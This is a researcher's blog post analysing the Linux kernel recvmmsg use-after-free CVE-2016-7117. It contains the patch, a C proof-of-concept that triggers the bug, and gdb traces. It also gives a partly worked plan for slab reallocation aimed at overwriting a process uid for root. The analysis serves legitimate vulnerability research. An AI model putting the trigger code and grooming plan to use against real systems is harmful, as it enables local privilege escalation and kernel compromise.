Notes about CVE-2016-7117
It's hard to find information about this, so I started looking deeper.
The Register has some cursory information:
The first of these (CVE-2016-7117) lies in the kernel networking subsystem allowing remote attackers to execute arbitrary code in the context of the kernel.
("Another critical hole (CVE-2016-0758 ) allows installed apps to execute arbitrary code within the context of the kernel via an elevation of privilege vulnerability in the kernel ASN.1 decoder." sounds fun too…)
The Debian and Ubuntu bug trackers both describe this as "use after
free in the recvmmsg exit path", which is a big hint. The Debian page
lists 4.5.2-1 as the "Fixed Version", which was released in
April. That page's changelog includes "net: Fix use after free in the
recvmmsg exit path". And so I found this email from March from Arnaldo
Carvalho de Melo, with a patch:
diff --git a/net/socket.c b/net/socket.c
index c044d1e8508c..db13ae893dce 100644
--- a/net/socket.c
+++ b/net/socket.c
@@ -2240,31 +2240,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
cond_resched();
}
-out_put:
- fput_light(sock->file, fput_needed);
-
if (err == 0)
- return datagrams;
+ goto out_put;
- if (datagrams != 0) {
+ if (datagrams == 0) {
+ datagrams = err;
+ goto out_put;
+ }
+
+ /*
+ * We may return less entries than requested (vlen) if the
+ * sock is non block and there aren't enough datagrams...
+ */
+ if (err != -EAGAIN) {
/*
- * We may return less entries than requested (vlen) if the
- * sock is non block and there aren't enough datagrams...
+ * ... or if recvmsg returns an error after we
+ * received some datagrams, where we record the
+ * error to return on the next call or if the
+ * app asks about it using getsockopt(SO_ERROR).
*/
- if (err != -EAGAIN) {
- /*
- * ... or if recvmsg returns an error after we
- * received some datagrams, where we record the
- * error to return on the next call or if the
- * app asks about it using getsockopt(SO_ERROR).
- */
- sock->sk->sk_err = -err;
- }
-
- return datagrams;
+ sock->sk->sk_err = -err;
}
+out_put:
+ fput_light(sock->file, fput_needed);
- return err;
+ return datagrams;
}
SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
--
2.5.0
This was merged and became 34b88a6 in the kernel repository.
This code is in __sys_recvmmsg; it looks roughly like this (before
the fix, at b6e4038, with irrelevant bits replaced with /* ... */):
int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
unsigned int flags, struct timespec *timeout)
{
int fput_needed, err, datagrams;
struct socket *sock;
struct mmsghdr __user *entry;
struct compat_mmsghdr __user *compat_entry;
struct msghdr msg_sys;
struct timespec end_time;
if (timeout &&
poll_select_set_timeout(&end_time, timeout->tv_sec,
timeout->tv_nsec))
return -EINVAL;
datagrams = 0;
sock = sockfd_lookup_light(fd, &err, &fput_needed);
if (!sock)
return err;
err = sock_error(sock->sk);
if (err)
goto out_put;
entry = mmsg;
compat_entry = (struct compat_mmsghdr __user *)mmsg;
while (datagrams < vlen) {
/* ... */
err = ___sys_recvmsg(sock,
(struct user_msghdr __user *)entry,
&msg_sys, flags & ~MSG_WAITFORONE,
datagrams);
if (err < 0)
break;
err = put_user(err, &entry->msg_len);
++entry;
}
if (err)
break;
++datagrams;
/* ... */
}
out_put:
fput_light(sock->file, fput_needed);
if (err == 0)
return datagrams;
if (datagrams != 0) {
/*
* We may return less entries than requested (vlen) if the
* sock is non block and there aren't enough datagrams...
*/
if (err != -EAGAIN) {
/*
* ... or if recvmsg returns an error after we
* received some datagrams, where we record the
* error to return on the next call or if the
* app asks about it using getsockopt(SO_ERROR).
*/
sock->sk->sk_err = -err;
}
return datagrams;
}
return err;
}
The old code calls sockfd_lookup_light, and doesn't always
fput_light before it returns; the new code always calls
fput_light. The email includes
And, as Dmitry rightly assessed, that is because we can drop the reference and then touch it when the underlying recvmsg calls return some packets and then hit an error, which will make recvmmsg to set sock->sk->sk_err, oops, fix it.
So, to demonstrate the use after free:
recvmmsgcallssockfd_lookup_light, which probably increases the refcount.recvmmsgcallsrecvmsgrecvmsgreturns an real packet.datagramsis incremented from 0.recvmmsgcallsrecvmsgrecvmsgreturns an error other than-EAGAIN.recvmmsgbreaks to the end of the whilefput_lightis called, which decreases the refcount if it was increased above. Then thestruct socketmay be freed at any point.err != 0, so we don'treturn datagramsdatagrams != 0, anderr != -EAGAIN, so we dosock->sk->sk_err = -err. Thissockmay have been freed afterfput_light, so this is a use after free.
Questions:
- How do we make
recvmsgerror for the second packet? - For a use-after-free, we need that to actually have been freed. How do we do that?
- Ultimately we want to get the allocation that takes the place where
sockwas, fill in theskpointer, and get the kernel to write to a place we choose. Is that realistic?
I'm going to think about this first from the perspective of a local user, since remote exploitation seems much harder.
Making recvmsg err
So __sys_recvmmsg calls ___sys_recvmsg, which calls
copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); and returns an
error if it does:
if (MSG_CMSG_COMPAT & flags)
err = get_compat_msghdr(msg_sys, msg_compat, &uaddr, &iov);
else
err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
if (err < 0)
return err;
this looks promising (in copy_msghdr_from_user):
if (!access_ok(VERIFY_READ, umsg, sizeof(*umsg)) ||
__get_user(uaddr, &umsg->msg_name) ||
__get_user(kmsg->msg_namelen, &umsg->msg_namelen) ||
__get_user(uiov, &umsg->msg_iov) ||
__get_user(nr_segs, &umsg->msg_iovlen) ||
__get_user(kmsg->msg_control, &umsg->msg_control) ||
__get_user(kmsg->msg_controllen, &umsg->msg_controllen) ||
__get_user(kmsg->msg_flags, &umsg->msg_flags))
return -EFAULT;
and the manpage says
ERRORS These are some standard errors generated by the socket layer. Additional errors may be generated and returned from the underlying protocol modules; see their manual pages.
… EFAULT The receive buffer pointer(s) point outside the process's address space.
So I think we can send two valid messages, and have the second
rcvmmsg header point to a bad receive buffer.
Closing the socket
This should be as easy as closing the socket in question in a thread
while another thread is in recvmmsg.
Trying it out
We'll try triggering the panic from userspace.
/* -*- compile-command: "gcc -Wall -Werror -pthread -static try_recvmmsg.c -o try_recvmmsg" -*- */
#define _GNU_SOURCE
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <pthread.h>
#define msg "hello!"
struct thread_config {
int fds[2];
char data[1024];
};
void *send_and_close_in_thread (void *arg)
{
struct thread_config *config = arg;
/* send the messages */
for (size_t i = 0; i < 2; i++) {
if (send(config->fds[0], msg, sizeof(msg), 0) != sizeof(msg)) {
fprintf(stderr, "++ in send: %m\n");
close(config->fds[0]);
close(config->fds[1]);
return NULL;
}
}
/* wait for it to be received, then close things, so that the kernel doesn't EBADF */
while (config->data[0] != msg[0]);;
close(config->fds[0]);
close(config->fds[1]);
return NULL;
}
int main (int argc, char **argv)
{
fprintf(stderr, "++ running!\n");
struct thread_config config = {0};
if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, config.fds)) {
fprintf(stderr, "++ in socketpair: %m\n");
return 1;
}
pthread_t thread = {0};
if (pthread_create(&thread, NULL, send_and_close_in_thread, &config)) {
fprintf(stderr, "++ in pthread_create: %m\n");
close(config.fds[0]);
close(config.fds[1]);
return 1;
}
/* receive the first message fine.
try to receive the second message to a buffer out of our address space,
so that ___sys_recvmsg will return EFAULT. */
recvmmsg(config.fds[1],
(struct mmsghdr[2]) {
{
.msg_hdr = {
.msg_iov = & (struct iovec) {
.iov_base = &config.data,
.iov_len = sizeof(config.data)
},
.msg_iovlen = 1
}
},
{
.msg_hdr = {
.msg_iov = & (struct iovec) {
.iov_base = (void*) (~0),
.iov_len = 1024,
},
.msg_iovlen = 1
}
},
},
2,
0,
& (struct timespec) { .tv_sec = 1 });
fprintf(stderr, "++ no panic? got %s.\n", config.data);
return 1;
}
The timing is a little tricky: we have a thread send messages, wait
for the first one to be received, and then close the fds. If it closes
before the call to __sys_recvmmsg, __sys_recvmmsg will return
EBADF. If it closes after __sys_recvmmsg sets the error on the
sk_buff, we won't get a use-after-free.
Then the main thread tries to recvmmsg two messages, with a bad
result buffer pointer on the second one. This way the second
___sys_recvmsg call errors, getting us on the code path we hit
before.
I checked this was the right code path like this (gdb connected
to qemu):
gdb) b copy_msghdr_from_user
Breakpoint 21 at 0xffffffff82668db0: file net/socket.c, line 1823.
(gdb) c
Continuing.
[Switching to Thread 1]
Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
1823 {
(gdb) finish
Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737e18, msg=0x1ffff1000d6e6003, msg_sys=0xffff88006b737df8,
flags=225341379, nosec=<optimized out>) at net/socket.c:2091
2091 err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $59 = 0
(gdb) c
Continuing.
Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
1823 {
(gdb) finish
Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737b10, msg=0xffff88006b737b28, msg_sys=0xffff88006b737df8,
flags=225341266, nosec=<optimized out>) at net/socket.c:2091
2091 err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $60 = -14
(gdb) b socket.c:2265
Breakpoint 22 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.
Thread 1 hit Breakpoint 22, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7ffc232faac0, vlen=<optimized out>, flags=0,
timeout=0xffff88006b737ee0) at net/socket.c:2265
2265 sock->sk->sk_err = -err;
(gdb)
After running it a gdb a lot in a VM built on b6e4038 (the commit
immediately before the fix), I got this (my notes in /* ... */ inline):
(gdb) b __sys_recvmmsg
Breakpoint 12 at 0xffffffff8266b440: file net/socket.c, line 2171.
(gdb) b socket.c:2265 /* sock->sk->sk_err = -err; */
Breakpoint 15 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.
Thread 2 hit Breakpoint 12, __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=2, flags=0, timeout=0xffff88006c4e7ee0)
at net/socket.c:2171
2171 {
/* temporary break at sockfd_lookup_light so we can 'finish' in it to see if what it returns,
as a cute trick to get around "<optimized out>" */
(gdb) tbreak sockfd_lookup_light
Temporary breakpoint 20 at 0xffffffff82665940: file net/socket.c, line 450.
(gdb) c
Continuing.
Thread 2 hit Temporary breakpoint 20, sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8)
at net/socket.c:450
450 {
(gdb) finish
Run till exit from #0 sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450
__sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2187
2187 if (!sock)
Value returned is $50 = (struct socket *) 0xffff88006bf61e00
(gdb) c
Continuing.
Thread 2 hit Breakpoint 15, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7fff9f3ccc80, vlen=<optimized out>, flags=0,
timeout=0xffff88006c4e7ee0) at net/socket.c:2265
2265 sock->sk->sk_err = -err;
/* !!! */
(gdb) p ((struct socket *)0xffff88006bf621c0)->file.f_count
Cannot access memory at address 0x38
/* ->file has been zeroed out, meaning this has been freed and used for something else */
(gdb) p ((struct socket *)0xffff88006bf621c0)->sk
$52 = (struct sock *) 0x0 <irq_stack_union>
(gdb) p &(((struct socket *)0xffff88006bf621c0)->sk->sk_err)
$53 = (int *) 0x1b0 <irq_stack_union+432>
(gdb)
So yes, we've got a use-after-free, and the kernel writes -err to
the address at 0x1b0.
Why does it only work sometimes? I think it's because the actual free
and using it again happens outside of the fput_light call tree, so
we're racing with another task or two in the kernel. But we can do it
repeatedly until it does work; it doesn't take long.
Reallocation
So we need to put some data where that struct socket used to be,
such that sk is a pointer to a piece of data whose offset
sk_err is where we would like to write.
struct socket is part of struct socket_alloc:
struct socket_alloc {
struct socket socket;
struct inode vfs_inode;
};
They're allocated in sock_alloc / sock_alloc_inode using the slab
allocator This means that they're grabbed from "caches", which
are spread across multiple "slabs". Caches are homogenous type-wise,
and e.g. each struct socket_alloc in a cache is pre-initialized.
Some resources about the slab allocator:
- "Slab Allocation" on Wikipedia
- "Anatomy of the Linux Slab Allocator" on IBM developerworks (apparently no longer available, so this is a link to an archive).
I can think of a situation where we can use the slab allocator to get what we want to happen:
- The slabs that are part of the
struct socket_alloccache (sock_inode_cache) fill up. - We create a socketpair for our use-after-free that occupies the first and second slot in a new slab.
- We close both elements of our socketpair. This causes the slab to be
freed. We then immediately add some items (more than a slabfull) to
another cache, with the pointer we want to write to at offset
skin each item. - This causes a new slab to be allocated for the second cache, which
ideally will be exactly where our first cache used to be. So, the
struct socketpointer in__sys_recvmmsgnow points to an item we control in a new slab. - The kernel code runs and sets the offset
sk_errfrom our pointer to-err.
Some things that make it easier:
- We can just repeatedly try it until it works, allocating an extra socket each time so that we progress through the slab.
/proc/slabinfosays that thesock_inode_cacheslab has 12 objects per slab (in my vm; it seems to vary). This is an upper bound on the number of sockets we'll need to open to get an object at the beginning of the slab, assuming no other process is creating sockets.
That sounds totally possible!
What are we getting the kernel to write to? err is -14 in our case, so
the kernel is writing 14 for us. If we control the pointer, though, we
can line it up only partially with a field we want to overwrite,
writing any portion of {0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00} anywhere we choose. Some ideas:
- Overwrite the uid of our process (and write
0xeto the byte before it), so that it has uid 0. - Overwrite a return address on the stack so that the kernel returns to code we choose. (This will be tricky with KASLR).
- Overwrite a boolean on the stack to either 0 or 0xe (truthy) to get around some permission check.
However, I'm not actually sure how aggressively slabs get reused by different caches, and I'm not sure of an easy way to find out. But! We can probably use a lot of memory to make that happen, or try freeing a couple dozen slabs at the same time.
Which cache do we try to write to?
/proc/slabinfo says the sock_inode_cache has objects of
size 640. This is kind of an inconvenient number, the only other
objects with that size are also inode caches, and they don't have any
user-controllable data at the offset of sk_err.
But the kmalloc cache kmalloc-1024 has 1024-size items in the
caches, and 16 of them fit in the cache. If we can find a path in the
kernel that copies data we control into a kmalloc bigger than 460 +
sk_err + sizeof(void *) = 896, we can get the kernel to set an int
at an address we choose to 14.
But there are a lot of calls to kmalloc in the kernel, and finding a
good one will take time. So I'm publishing this now; I'll write
more when I find one.
How much trouble are we in?
I think this exploit will work, so we have a pretty bad local privilege escalation bug. I was able to trigger the use-after-free in less than an hour of work after reading the description of the bug, and I'm not even a kernel hacker. Given more time I'm pretty sure I could make it repeatably write to a location of our choice.
I think this would be difficult to exploit remotely, for the following reasons:
recvmmsgis much less common thanrecvmsg, in the wild. GitHub search shows about 800k uses ofrecvmmsgvs about 3.6 million forrecvmsg.recvmsgisn't all that common anyway;recvhas about 29 million uses on GitHub.- A remote attacker would need to cause the
recvmsgto err and cause the socket to close while in therecvmmsgcall. Looking casually, I didn't see a great way to causerecvmmsgto err from the sending side.recvmsgandrecvmmsgare normally used for connectionless protocols, anyway, so I wouldn't expect it to be easy to cause a service to close its socket.
But I'd love to be proven wrong.